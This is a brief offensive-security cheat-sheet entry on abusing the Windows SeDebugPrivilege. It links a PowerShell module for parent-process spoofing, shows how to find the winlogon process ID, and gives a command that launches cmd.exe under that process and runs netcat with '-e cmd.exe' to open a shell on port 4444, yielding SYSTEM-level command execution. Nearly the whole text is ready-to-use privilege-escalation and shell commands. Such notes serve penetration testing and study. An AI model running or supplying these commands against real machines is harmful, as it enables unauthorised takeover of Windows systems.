SeDebugPrivilege

You can update update proc attribute list with this privilege and can elevate privileges.

Use the module below to do that.

• https://github.com/decoder-it/psgetsystem/blob/master/psgetsys.ps1

import-module .\psgetsys.ps1

Find pid of a process that is privileged.

Get-Process winlogon

Use that pid to attach & execute commands

[MyProcess]::CreateProcessFromParent("552","c:\windows\system32\cmd.exe", "/c c:\windows\temp\nc.exe 127.0.0.1 4444 -e cmd.exe")